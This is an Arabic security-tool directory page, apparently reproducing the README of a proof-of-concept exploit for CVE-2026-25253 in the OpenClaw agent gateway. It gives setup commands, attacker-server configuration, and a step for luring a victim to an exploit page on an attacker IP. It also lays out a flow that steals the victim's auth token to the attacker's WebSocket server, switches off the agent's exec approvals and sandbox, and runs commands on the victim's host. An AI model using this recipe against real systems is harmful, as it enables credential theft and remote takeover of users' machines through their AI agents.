Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-25253-research — إثبات مفهوم لاستغلال CVE-2026-25253، يوضح تنفيذ الأوامر عن بُعد (RCE) بنقرة واحدة على OpenClaw عبر اختطاف WebSocket عبر المواقع (Cross-Site WebSocket Hijacking). يتضمن خادم المهاجم وحمولة قائمة على المتصفح لسرقة الرموز وتنفيذ الأوامر. | Kitploit
أدوات/GitHubGitHub/al4n4n/cve-2026-25253-research
الاستطلاعالاستغلالاستغلال تطبيقات الويبأمن الويبالفريق الأحمرتطوير الحمولات
GitHubal4n4n/cve-2026-25253-research

CVE-2026-25253-research

إثبات مفهوم لاستغلال CVE-2026-25253، يوضح تنفيذ الأوامر عن بُعد (RCE) بنقرة واحدة على OpenClaw عبر اختطاف WebSocket عبر المواقع (Cross-Site WebSocket Hijacking). يتضمن خادم المهاجم وحمولة قائمة على المتصفح لسرقة الرموز وتنفيذ الأوامر.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
71منذ 6 أشهرلم تتم المراجعة بعد

CVE-2026-25253 إثبات المفهوم

استغلال تنفيذ أوامر عن بُعد بنقرة واحدة على OpenClaw عبر اختطاف WebSocket عبر المواقع.

إخلاء مسؤولية: يُقدَّم هذا الكود لأغراض البحث الأمني المصرح به والتعليم فقط. استخدام هذا الكود ضد أنظمة دون إذن كتابي صريح غير قانوني وغير أخلاقي. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.

المدونة

اقرأ التحليل التفصيلي للحصول على تفصيل على مستوى الكود المصدري لهذه الثغرة وكيفية بناء هذا الإثبات.

المتطلبات الأساسية

  • Node.js (الإصدار 18 أو أحدث)
  • مثيل OpenClaw قيد التشغيل مع البوابة على جهاز الضحية (الافتراضي: localhost:18789)
  • يجب أن يكون لدى الضحية رمز مصادقة نشط مخزّن في متصفحه (أي أنه استخدم واجهة التحكم من قبل)

تثبيت Node.js

macOS (Homebrew):

root@kitploit:~
brew install node

Ubuntu / Debian:

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_22.x | sudo -E bash -
sudo apt-get install -y nodejs

Windows:

قم بتنزيل المثبّت من https://nodejs.org/ واتبع التعليمات.

تحقق من التثبيت:

root@kitploit:~
node -v
npm -v

الإعداد

root@kitploit:~
git clone https://github.com/al4n4n/CVE-2026-25253-research.git
cd CVE-2026-25253-research
npm install

يؤدي هذا إلى تثبيت الاعتماد الوحيد: ws (مكتبة WebSocket).

الإعدادات

عدّل أعلى ملف exploit.html ليتوافق مع بيئتك:

root@kitploit:~
const LOCAL_SCHEME = 'http';                // مخطط واجهة التحكم للضحية
const GATEWAY_URL = 'ws://127.0.0.1:18789'; // البوابة المحلية للضحية
const ATTACKER_WS_PORT = 8080;              // منفذ WebSocket للمهاجم (يجب أن يطابق attacker-server.js)
const ATTACKER_SCHEME = 'ws';               // استخدم 'wss' إذا كان خلف TLS
const COMMAND = 'touch /tmp/success';       // الأمر الذي سيُنفَّذ على جهاز الضحية

عدّل أعلى ملف attacker-server.js إذا كنت بحاجة إلى منافذ مختلفة:

root@kitploit:~
const HTTP_PORT = 3000;  // يقدّم exploit.html
const WS_PORT = 8080;    // يلتقط الرموز المسروقة

التشغيل

1. ابدأ خادم المهاجم

root@kitploit:~
node attacker-server.js

يجب أن ترى:

root@kitploit:~
============================================================
CVE-2026-25253 Attack Server
============================================================

[HTTP]  Exploit page: http://0.0.0.0:3000/exploit.html
[WS]    Token capture: ws://0.0.0.0:8080

Waiting for victim...

2. استدراج الضحية

أرسل للضحية الرابط التالي (استبدل <ATTACKER_IP> بعنوان IP الخاص بك):

root@kitploit:~
http://<ATTACKER_IP>:3000/exploit.html

يجب على الضحية فتح هذا الرابط في متصفح استخدم فيه واجهة تحكم OpenClaw من قبل (بحيث يكون رمز المصادقة موجودًا في localStorage).

3. ما يحدث

root@kitploit:~
┌──────────────────────────────────────────────────────────────────────────┐
│                          EXPLOIT FLOW                                    │
├──────────────────────────────────────────────────────────────────────────┤
│                                                                          │
│  1. Victim visits http://<attacker>:3000/exploit.html                    │
│     │                                                                    │
│  2. Page opens popup: http://127.0.0.1:18789?gatewayUrl=ws://<attacker>  │
│     │                                                                    │
│  3. Control UI in popup reads token from localStorage                    │
│     and sends it to attacker's WS server via gatewayUrl                  │
│     │                                                                    │
│  4. Attacker server rejects first connect (device token)                 │
│     Control UI retries with settings token → CAPTURED                    │
│     │                                                                    │
│  5. exploit.html opens its OWN WebSocket to ws://127.0.0.1:18789         │
│     (Cross-Site WebSocket Hijacking - no Origin validation)              │
│     │                                                                    │
│  6. Authenticates with stolen token, disables security:                  │
│     • exec.approvals.set → ask: "off"                                    │
│     • config.patch → host: "gateway", sandbox.mode: "off"                │
│     │                                                                    │
│  7. Sends agent command → RCE on victim host                             │
│                                                                          │
└──────────────────────────────────────────────────────────────────────────┘

4. التحقق

على جهاز الضحية، تحقق مما إذا كان الأمر قد نُفِّذ:

root@kitploit:~
ls -la /tmp/success

الملفات

الملفالوصف
attacker-server.jsخادم HTTP (يقدّم صفحة الاستغلال) + خادم WebSocket (يلتقط الرموز المسروقة)
exploit.htmlحمولة الاستغلال المستندة إلى المتصفح التي تسرق الرموز، وتختطف WebSocket، وتعطّل الأمان، وتنفّذ الأوامر
package.json
تنزيل الأداة
تبعيات Node.js (ws)